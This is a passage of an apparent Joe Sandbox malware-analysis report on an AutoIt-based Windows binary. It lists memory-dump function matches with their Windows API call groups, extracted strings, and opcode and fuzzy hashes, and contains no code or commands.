                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _onexit
                                                                                                          • String ID:
                                                                                                          • API String ID: 572287377-0
                                                                                                          • Opcode ID: 773ed23fe7bc1dd7e8b75972c2a26041a0abafe16c5f42d1a8e6024edf34d541
                                                                                                          • Instruction ID: 7dfe2c767d678e4bc57fe7e7bb2426dd25863b4333ec20522de3e1c83923a933
                                                                                                          • Opcode Fuzzy Hash: 773ed23fe7bc1dd7e8b75972c2a26041a0abafe16c5f42d1a8e6024edf34d541
                                                                                                          • Instruction Fuzzy Hash: F9C01200E6A44B80E91C77BE48B70F401901FABB00F900535C20DC0297DD4C55F60B51
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _onexit
                                                                                                          • String ID:
                                                                                                          • API String ID: 572287377-0
                                                                                                          • Opcode ID: 5447c473e94d7294484c99fc93f4d38cb7bf7a8a438e953c913b8a13f1fa59d2
                                                                                                          • Instruction ID: 174bcaf6af0c8168552200115203fe22e7131e4d315d3901e42b3301b9b14672
                                                                                                          • Opcode Fuzzy Hash: 5447c473e94d7294484c99fc93f4d38cb7bf7a8a438e953c913b8a13f1fa59d2
                                                                                                          • Instruction Fuzzy Hash: 27C01201E6A44B80E61C73BE4CB60F801900FE7B00F900235C20DC128BDD5C59F64A21
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 1452528299-0
                                                                                                          • Opcode ID: b1ea28e244f60b4af54ff34aaaf102a183879d86c5d4002b95e89690f8712e5a
                                                                                                          • Instruction ID: ed4faba592ceb9a305329946ac9c9d547fcbae70f8e0dee58c5634986ac7bed4
                                                                                                          • Opcode Fuzzy Hash: b1ea28e244f60b4af54ff34aaaf102a183879d86c5d4002b95e89690f8712e5a
                                                                                                          • Instruction Fuzzy Hash: E5714922B08A4286EB64EF69D4A13ED2760EB46F84F444132DF0D9779BCF79E945C350
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 4292702814-0
                                                                                                          • Opcode ID: 56853fc6be513b26808fd6ceb43c2b1e56f5d2842f756231a7c5debb2bb5ead3
                                                                                                          • Instruction ID: e1569c482281e97679e643801834b587157d685727ce9cb7f7e3f9c81e13ebe1
                                                                                                          • Opcode Fuzzy Hash: 56853fc6be513b26808fd6ceb43c2b1e56f5d2842f756231a7c5debb2bb5ead3
                                                                                                          • Instruction Fuzzy Hash: A7F06284B0920785FE5D9769E4763F512919F56F40F4C4531CB0EC62DFDE2CEE458210
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 4292702814-0
                                                                                                          • Opcode ID: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
                                                                                                          • Instruction ID: 9801654d78ac3669ace796a053747b7576b05db3677bcd34184e6da9e5815359
                                                                                                          • Opcode Fuzzy Hash: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
                                                                                                          • Instruction Fuzzy Hash: 6EF05E41B1924785FE289BB9B87A7F851925F46FA0F084230DB2EC92CBDE5CEC818710
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                                                          • API String ID: 2211948467-2373415609
                                                                                                          • Opcode ID: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
                                                                                                          • Instruction ID: df83c79b73ad8c2427c5f972eafd2076a04fc0d5f916e6f319fd93f82cc4821f
                                                                                                          • Opcode Fuzzy Hash: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
                                                                                                          • Instruction Fuzzy Hash: CD22A336A08A4186E710DF29E8A49AD77A1FB89F94F504135DF4E87BA9DF3CD845CB00
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$ClientScreen$LongStateWindow$CursorMenuPopupTrack$ParentProc
                                                                                                          • String ID: @GUI_DRAGID$F
                                                                                                          • API String ID: 1993697042-4164748364
                                                                                                          • Opcode ID: 56f72f09bbed6945763f30ad9d633d39a2232c5a8ce1cdf1e6a0990a4f5aa755
                                                                                                          • Instruction ID: a9b8a080602026895dc080d6f0957524521ea659844ebf8424c6ae5b80fa59f9
                                                                                                          • Opcode Fuzzy Hash: 56f72f09bbed6945763f30ad9d633d39a2232c5a8ce1cdf1e6a0990a4f5aa755
                                                                                                          • Instruction Fuzzy Hash: A9528036A48A4696EB548F69D4A4AFD7761FB86F84F104135DB0D83AEACF3CE850C700
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DeleteDestroyIconImageLoadLongMessageObjectSendWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3481653762-0
                                                                                                          • Opcode ID: 0009db8de3ffea259ba8a46f35c7ba5ff9efa5b40b0df71df5247db5c8e89bc7
                                                                                                          • Instruction ID: d1f4e0022325016d99e9aff603005bc4abee045baabc26aea43b338456af6772
                                                                                                          • Opcode Fuzzy Hash: 0009db8de3ffea259ba8a46f35c7ba5ff9efa5b40b0df71df5247db5c8e89bc7
                                                                                                          • Instruction Fuzzy Hash: 25327E3AA08A818AF750DF29D464AE977A1FB86F84F504135DB4E87B99CF3CE945C700
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window$LongMenuText$CharInfoItemNextwsprintf
                                                                                                          • String ID: %d/%02d/%02d
                                                                                                          • API String ID: 1218376639-328681919
                                                                                                          • Opcode ID: 88d0c6dc924de39b2680e6b6a0383be569fd99a49510e92f6d82c1925c8df759
                                                                                                          • Instruction ID: 0b93db90f5cb79961728a42b7ae0ff73244265b721a9a73c0b1af0af821f0175
                                                                                                          • Opcode Fuzzy Hash: 88d0c6dc924de39b2680e6b6a0383be569fd99a49510e92f6d82c1925c8df759
                                                                                                          • Instruction Fuzzy Hash: 2012D132B0965286FB648B299864AFD27A0FF86F94F504135DB1D87BDACF3CD8428704
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$MessageSend$Menu$Item$EnableInfoMove$DefaultShow$DrawFocusLongRect
                                                                                                          • String ID: P
                                                                                                          • API String ID: 1208186926-3110715001
                                                                                                          • Opcode ID: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
                                                                                                          • Instruction ID: 6bd1a82eece02a7fe64bd9649c607588a12c9916d717cff528dea2b1cabe414f
                                                                                                          • Opcode Fuzzy Hash: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
                                                                                                          • Instruction Fuzzy Hash: D312D476A0868286F7248B29D465BF927A0FB87B94F104535DB4D87ADACF3CEC51CB04
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                          • String ID: A$AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                          • API String ID: 2910397461-2439800395
                                                                                                          • Opcode ID: 6a4158767fd1e3aa62d6cad0ab6a36848a32ab8b88e438b2c1d2663541e17033
                                                                                                          • Instruction ID: 56ee1423ad2638efa569b61204ffbfd1afd47e64765d7b413ca7da10926727ab
                                                                                                          • Opcode Fuzzy Hash: 6a4158767fd1e3aa62d6cad0ab6a36848a32ab8b88e438b2c1d2663541e17033
                                                                                                          • Instruction Fuzzy Hash: 57E1C47660878187E750DF29E854AA97BA0FB89B94F500135DF4E93BA9CF7CE845CB00
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                          • String ID: Shell_TrayWnd
                                                                                                          • API String ID: 3778422247-2988720461
                                                                                                          • Opcode ID: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
                                                                                                          • Instruction ID: 90eaff295d4404fa45ca1b199bdd6348b74d9495e930798222d9968108ce506d
                                                                                                          • Opcode Fuzzy Hash: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
                                                                                                          • Instruction Fuzzy Hash: 56417821F4891343F7145B2DA834A7E2291BF8AF91F545035CA1EC7BDADE3DAC4A8740
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Destroy$ImageList_Window$DeleteMessageObjectSend$IconMove
                                                                                                          • String ID:
                                                                                                          • API String ID: 3372153169-0
                                                                                                          • Opcode ID: cebe50662675a261df0ce57bb688d6874ca0698041b92cdd573b2dd792630721
                                                                                                          • Instruction ID: 557f2f08f09542dce110e87e6a094be83f95419273bf985f395669c0998b2a11
                                                                                                          • Opcode Fuzzy Hash: cebe50662675a261df0ce57bb688d6874ca0698041b92cdd573b2dd792630721
                                                                                                          • Instruction Fuzzy Hash: 2A22B022A08A8386EB609B28D4646FD67A1FF42F94F544136CB1E876DADF3DEC41C710
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$StationWindow$CloseCurrentHandleUser$CreateDuplicate$BlockDesktopEnvironmentHeapOpenProfileToken$AdjustAllocDestroyErrorLastLoadLogonLookupPrivilegePrivilegesThreadUnloadValuewcscpy
                                                                                                          • String ID: default$winsta0$winsta0\default
                                                                                                          • API String ID: 3202303201-1423368268
                                                                                                          • Opcode ID: de7527ded46d2e32930649954c580003a2a01d55c070abe543a614e541a7caf5
                                                                                                          • Instruction ID: 2bc4e76a6bf87559dcce62c5a779def8fe3234dfe979b2dbb39de87e567a8029
                                                                                                          • Opcode Fuzzy Hash: de7527ded46d2e32930649954c580003a2a01d55c070abe543a614e541a7caf5
                                                                                                          • Instruction Fuzzy Hash: E2A14C32A08B428AE710DF69A4606E963A1FB86B94F541136DF5D87B9ECF3CE805C750
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpy_s$_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2880407647-0
                                                                                                          • Opcode ID: 58aa0ebf662a58accb0a9b8196807729812b5725d699f5f78ac16d2d228f8c2a
                                                                                                          • Instruction ID: b65b55129e255f9a035fe37e37cd1b2aebe5603b9f0cd31ba9db27baf7a21780
                                                                                                          • Opcode Fuzzy Hash: 58aa0ebf662a58accb0a9b8196807729812b5725d699f5f78ac16d2d228f8c2a
                                                                                                          • Instruction Fuzzy Hash: 3803B672A041C68BDB7A8E29E470BF937A5F785B88F401135DB4997B5EDF38AD048B40
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Menu$InfoItemTextWindow$CharDrawInvalidateNextRect
                                                                                                          • String ID:
                                                                                                          • API String ID: 1015379403-0
                                                                                                          • Opcode ID: 811f6ddedc4938916125b3772b32f534d797e58df8d8128b9f335a51bc1c3411
                                                                                                          • Instruction ID: 946dae7cd90bb12720aad3ec66ae386da6032f9d5884adcf11edcdc52b0d4a87
                                                                                                          • Opcode Fuzzy Hash: 811f6ddedc4938916125b3772b32f534d797e58df8d8128b9f335a51bc1c3411
                                                                                                          • Instruction Fuzzy Hash: C402E431A0868286EB608F2894646F92761FB96F94F544232DB6D97BDECF3CED41C704
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Cursor$Load$ErrorInfoLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 3215588206-0
                                                                                                          • Opcode ID: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                                                                          • Instruction ID: f324fb83d8e3bfdf7a1a2692f4c1eb32e60d19c947b251e472f3867756ac4802
                                                                                                          • Opcode Fuzzy Hash: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                                                                          • Instruction Fuzzy Hash: 90512132B4CB028AEB589F68E4695BD37A1EB4AB44F144439DA0EC37C9DE7CD8568344
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _invalid_parameter_noinfomemcpy_s$fegetenv
                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                          • API String ID: 281475176-2761157908
